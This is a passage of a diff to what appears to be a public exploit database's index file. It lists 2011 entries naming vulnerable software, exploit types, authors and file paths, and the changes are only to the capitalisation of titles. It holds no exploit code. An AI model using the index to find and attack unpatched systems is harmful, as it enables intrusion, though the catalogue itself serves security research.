Injection",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 -17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 +17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17560,platforms/php/webapps/17560.txt,"Joomla Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 @@ -15266,7 +15266,7 @@ id,file,description,date,author,platform,type,port 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17567,platforms/osx/dos/17567.txt,"Safari 5.0.6/5.1 - SVG DOM Processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",windows,dos,0 -17570,platforms/php/webapps/17570.txt,"Musicbox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0 +17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 @@ -15291,7 +15291,7 @@ id,file,description,date,author,platform,type,port 17597,platforms/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos,0 -17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 +17602,platforms/php/webapps/17602.txt,"Wordpress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 @@ -15300,17 +15300,17 @@ id,file,description,date,author,platform,type,port 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow",2011-08-05,ZadYree,linux,local,0 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 -17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0 +17613,platforms/php/webapps/17613.php,"Wordpress Plugin E-commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 -17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 -17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17616,platforms/php/webapps/17616.txt,"Wordpress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17617,platforms/php/webapps/17617.txt,"Wordpress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server Denial of Service (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 - session hijacking",2011-08-07,seth,php,webapps,0 -17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 -17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17627,platforms/php/webapps/17627.txt,"Wordpress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17628,platforms/php/webapps/17628.txt,"Wordpress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 @@ -15338,7 +15338,7 @@ id,file,description,date,author,platform,type,port 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - XRF / Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 -17660,platforms/php/webapps/17660.txt,"videoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 +17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 @@ -15346,23 +15346,23 @@ id,file,description,date,author,platform,type,port 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 -17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 +17673,platforms/php/webapps/17673.txt,"Wordpress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component - Local File Inclusion",2011-08-17,NoGe,php,webapps,0 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 -17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite Plugin 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17681,platforms/php/webapps/17681.txt,"WordPress OdiHost Newsletter plugin 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17677,platforms/php/webapps/17677.txt,"Wordpress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17678,platforms/php/webapps/17678.txt,"Wordpress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17679,platforms/php/webapps/17679.txt,"Wordpress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17680,platforms/php/webapps/17680.txt,"Wordpress Easy Contact Form Lite Plugin 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17681,platforms/php/webapps/17681.txt,"Wordpress OdiHost Newsletter plugin 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 -17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17683,platforms/php/webapps/17683.txt,"Wordpress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17684,platforms/php/webapps/17684.txt,"Wordpress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 -17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17686,platforms/php/webapps/17686.txt,"Wordpress Ajax Gallery plugin 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17687,platforms/php/webapps/17687.txt,"Wordpress Global Content Blocks plugin 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17688,platforms/php/webapps/17688.txt,"Wordpress Allow PHP in Posts and Pages plugin 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17689,platforms/php/webapps/17689.txt,"Wordpress Menu Creator plugin 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,Metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 @@ -15372,12 +15372,12 @@ id,file,description,date,author,platform,type,port 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - (xfr.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 -17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 +17702,platforms/php/webapps/17702.rb,"Wordpress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",php,webapps,0 -17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 +17704,platforms/php/webapps/17704.txt,"Wordpress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh jakesh",php,webapps,0 17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 -17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 +17707,platforms/php/webapps/17707.txt,"Wordpress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 17708,platforms/php/webapps/17708.txt,"Web Solutions Wcs2u - SQL Injection",2011-08-22,tempe_mendoan,php,webapps,0 17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17710,platforms/php/webapps/17710.txt,"DV Cart Shopping Cart software - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 @@ -15386,62 +15386,62 @@ id,file,description,date,author,platform,type,port 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (add admin)",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 -17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 +17716,platforms/php/webapps/17716.txt,"Wordpress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 -17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 +17720,platforms/php/webapps/17720.txt,"Wordpress Photoracer plugin 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0 -17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17724,platforms/php/webapps/17724.txt,"Wordpress Js-appointment plugin 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17725,platforms/php/webapps/17725.txt,"Wordpress MM Forms Community plugin 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 -17728,platforms/php/webapps/17728.txt,"WordPress Super CAPTCHA plugin 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 +17728,platforms/php/webapps/17728.txt,"Wordpress Super CAPTCHA plugin 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17729,platforms/php/webapps/17729.txt,"Wordpress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17730,platforms/php/webapps/17730.txt,"Wordpress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17731,platforms/php/webapps/17731.txt,"Wordpress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 -17735,platforms/windows/local/17735.pl,"yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 +17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 17736,platforms/php/webapps/17736.txt,"joomla simple file lister module 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0 -17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17737,platforms/php/webapps/17737.txt,"Wordpress Facebook Promotions plugin 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17738,platforms/php/webapps/17738.txt,"Wordpress Evarisk plugin 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17739,platforms/php/webapps/17739.txt,"Wordpress Profiles plugin 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17740,platforms/php/webapps/17740.txt,"Wordpress mySTAT plugin 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 -17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17748,platforms/php/webapps/17748.txt,"Wordpress SH Slideshow plugin 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17749,platforms/php/webapps/17749.txt,"Wordpress iCopyright(R) Article Tools plugin 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17750,platforms/php/webapps/17750.txt,"Wordpress Advertizer plugin 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17751,platforms/php/webapps/17751.txt,"Wordpress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0 -17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio gallery playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17758,platforms/php/webapps/17758.txt,"WordPress PureHTML plugin 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17760,platforms/php/webapps/17760.txt,"WordPress grapefile plugin 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17761,platforms/php/webapps/17761.txt,"WordPress Plugin image gallery with slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17755,platforms/php/webapps/17755.txt,"Wordpress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17756,platforms/php/webapps/17756.txt,"Wordpress Plugin audio Gallery playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17757,platforms/php/webapps/17757.txt,"Wordpress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17758,platforms/php/webapps/17758.txt,"Wordpress PureHTML plugin 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17759,platforms/php/webapps/17759.txt,"Wordpress Couponer plugin 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17760,platforms/php/webapps/17760.txt,"Wordpress grapefile plugin 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17761,platforms/php/webapps/17761.txt,"Wordpress Plugin image Gallery with slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow",2011-08-31,Metasploit,windows,remote,0 -17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17764,platforms/php/webapps/17764.txt,"WordPress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17763,platforms/php/webapps/17763.txt,"Wordpress Donation plugin 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17764,platforms/php/webapps/17764.txt,"Wordpress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 -17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17767,platforms/php/webapps/17767.txt,"Wordpress SearchAutocomplete plugin 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,Metasploit,windows,local,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 -17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 +17771,platforms/php/webapps/17771.txt,"Wordpress VideoWhisper Video Presentation plugin 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 -17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 +17773,platforms/php/webapps/17773.txt,"Wordpress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 -17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 -17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 +17778,platforms/php/webapps/17778.txt,"Wordpress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 +17779,platforms/php/webapps/17779.txt,"Wordpress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - (chat-cache.txt) Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,php,webapps,0 @@ -15449,31 +15449,31 @@ id,file,description,date,author,platform,type,port 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 